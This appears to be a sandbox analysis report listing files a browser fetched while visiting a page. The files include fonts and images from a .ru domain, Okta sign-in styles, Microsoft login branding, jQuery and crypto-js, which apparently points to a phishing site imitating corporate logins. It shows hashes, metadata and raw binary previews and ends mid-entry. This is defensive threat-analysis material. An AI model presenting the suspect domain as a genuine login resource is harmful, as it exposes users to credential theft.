                                                                      Preview:......Exif..MM.*...............@.......................................................................................(...........1.....!.....2..........i.............$.......-....'..-....'.Adobe Photoshop 22.3 (Macintosh).2021:05:25 08:23:03..............0231...................................8...............................r...........z.(.................................3.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....I.5$.I)I$.JRI$...I$.$.I)I$.JR...0.Os.+...9w.@D...h.......Q.K.........(..Q
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                      Category:downloaded
                                                                      Size (bytes):35970
                                                                      Entropy (8bit):7.989503040923577
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                      SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                      SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                      SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/GDSherpa-bold.woff
                                                                      Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                      Category:downloaded
                                                                      Size (bytes):10796
                                                                      Entropy (8bit):7.946024875001343
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                      SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                      SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                      SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                      Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):128
                                                                      Entropy (8bit):4.750616928608237
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                      SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                      SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                      SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCX2JdJzUAp8wEgUNX1f-DRIFDRObJGMhKqZqPtL5d7sSSgknph3AWHGWIRIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IduxyS9z8ztY?alt=proto
                                                                      Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 280 x 56, 8-bit/color RGBA, non-interlaced
                                                                      Category:downloaded
                                                                      Size (bytes):5399
                                                                      Entropy (8bit):7.927805487947393
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:F4545D2859E72632194B2447B462CF5E
                                                                      SHA1:255A88F68B2972E7B9888EC681EA3F6E3863D27F
                                                                      SHA-256:17B76293E74E9825CB264CFB67D07ED60FAB98A170526FB7B4408BCCE505C117
                                                                      SHA-512:817550E1CA55EB8A95A4B5C8E836BF5AD5C64B2BDF3241F971B485B6BD58B7DDB1247D257480A509469D89937EFCAA63E2818BF5878F5734EF7B0397994F7F57
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://aadcdn.msauthimages.net/c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/bannerlogo?ts=637580033998959238
                                                                      Preview:.PNG........IHDR.......8.....&U......IDATx..]{.\E....d..I...H....Q..y.H....'3"...e..8*.F8......v^ l..".... b.U@^..ADX .,.J.7...-..y...{.o.g..p..s..[..W_U....DD.\:K..OT.._.....xO5.j....xE5.3.%nT..,...4k..e.TM.Z..TSl../v....f..UK.....W~..).0d..U-.c...V.f..3B|.O.Z\6U.........!..E..H.b.T:4S|....^T.%.&>#...,....?~.U...d)R...U..'..].~A...o.|..R.H..!#D.j.w.G0.......)R...j.]cN...L.<{.m."E...e..kbH0l.:..:.6M."..(=..c#u\Kl....;..M.bb......d.bqj.\z.j... .'2...U\v.../..]. 3Y.n....Z..f.'..o.k..H.BQ....$.X6...'...*...)..L*.xU3........0.....d..)R$...ljp..*......QM.5@...T>.U.5..8Hw..hUv..).@.q.y...Bu9.5S.6!..|./....#E..-.....A3.}Ab...GI#.o$%.H!...!M;.eg+r..B'..2........B....;E...TS.....'....M..#I.T...=:.C....8...8.{....8....I...}....v.I..}...c\p..9..N...c...9D..h..Z.P_....k.9x...|/....'I.T>*..l6.......4..uCCC..].=.D..a....Ct.H0..N...[.......%I....$..G0.A.#.I]....Gz,2.8.P(hI..P(....3...p[.7..$...T.a._`.....|... ..,{.X.....K....a............x=I.#...`...k......
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                      Category:dropped
                                                                      Size (bytes):937
                                                                      Entropy (8bit):7.737931820487441
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:FC3B7BBE7970F47579127561139060E2
                                                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                      Category:downloaded
                                                                      Size (bytes):17842
                                                                      Entropy (8bit):7.821645806304586
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:4B52ECDC33382C9DCA874F551990E704
                                                                      SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                      SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                      SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/stzUMfCJwsYYQSZDUiXPk9wCLE451Cteu0znmX3rYqpg9R7UWp9NlPjgh260
                                                                      Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                      Category:downloaded
                                                                      Size (bytes):28584
                                                                      Entropy (8bit):7.992563951996154
                                                                      Encrypted:true
                                                                      SSDEEP:
                                                                      MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                      SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                      SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                      SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/GDSherpa-regular.woff2
                                                                      Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                      Category:downloaded
                                                                      Size (bytes):36696
                                                                      Entropy (8bit):7.988666025644622
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                      SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                      SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                      SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/GDSherpa-regular.woff
                                                                      Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):48316
                                                                      Entropy (8bit):5.6346993394709
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:SVG Scalable Vector Graphics image
                                                                      Category:dropped
                                                                      Size (bytes):1864
                                                                      Entropy (8bit):5.222032823730197
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (65447)
                                                                      Category:downloaded
                                                                      Size (bytes):89501
                                                                      Entropy (8bit):5.289893677458563
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:SVG Scalable Vector Graphics image
                                                                      Category:downloaded
                                                                      Size (bytes):268
                                                                      Entropy (8bit):5.111190711619041
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:59759B80E24A89C8CD029B14700E646D
                                                                      SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                      SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                      SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/opLSiaB9ByXzXiMLXkUtTDVNvC5uvO3K5VoVfvy4h6Q4hC6ljuJ8SswDsKef195
                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                      Category:downloaded
                                                                      Size (bytes):93276
                                                                      Entropy (8bit):7.997636438159837
                                                                      Encrypted:true
                                                                      SSDEEP:
                                                                      MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                      SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                      SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                      SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/GDSherpa-vf2.woff2
                                                                      Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (51734)
                                                                      Category:downloaded
                                                                      Size (bytes):222931
                                                                      Entropy (8bit):5.0213311632628725
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                      SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                      SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                      SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                      Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 280 x 60, 8-bit/color RGBA, non-interlaced
                                                                      Category:downloaded
                                                                      Size (bytes):3666
                                                                      Entropy (8bit):7.918283721458629
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:C9F31E87400C46F9F8FB580602328C72
                                                                      SHA1:4B538CA736FB2A88A89214AD5EB0B2B80640B5AB
                                                                      SHA-256:DDE1ACEFE23281E3715BDEE565CF1FD7064370D4BB751AB92C4ADD7D42932BBE
                                                                      SHA-512:A9EC3AFFF1F92BD76371C640C17585F9578CAF202594A7BED0FA3ABFA35A23031CDE7C347445B3FE68890AD0FFE1C8469765185C974E65440A08FA2B10797CA1
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089
                                                                      Preview:.PNG........IHDR.......<............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]...U.>7P..7..B......P.."* F*..I@..,]..I+@@@"K.-..<B..x1...p].Y.A<..W.....0.=...g........{g...}..g......h.1..q..j.....#..{..}.m.QE..Q(.NP..Ks.mn..].q....!...@.P(.Q(..`...B..B.P..P(..(...2..B.....(..`......d|.j..$.A......R..P(.2..t.F...P.&..`.A...:<I..j..8Z...'Sa.......MB..e0....Yl.........c..[..............t7:?...Z.j....t.ItO..(.....ab......"0..,e$1..>.R6.)4.f........!I3.ct.)i...s\..H......WU.....?.P.D.F..Lt8K}uX.V..1...7&.`s.........lj.a}U....j..F..m.g.}.U~.|.......z"..w*.q.s..!z ....z#M..4!..D..c...UU(\......W...]..2...C..TEr..lP+..r......,.d.Q..@'.5U(H...!lq..9...$......l#~.<............o.WT.PG8.3.TEr.AD..(.`...G'.*.D_...T...{..m.r...e)....(..*...l......0..........6.:.....2..$.....y.J.....1...+Q...p_......z...q....thf2;3'.vc.P.{b..w..!.'.GT..|. ..tm...M......m.#......r...LA./......>..oX.m..."b;......w.6.;....@..](.n..*.x.>...cD.......N..hf....;ok..9*.K.....D..2.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (10017)
                                                                      Category:downloaded
                                                                      Size (bytes):10245
                                                                      Entropy (8bit):5.437589264532084
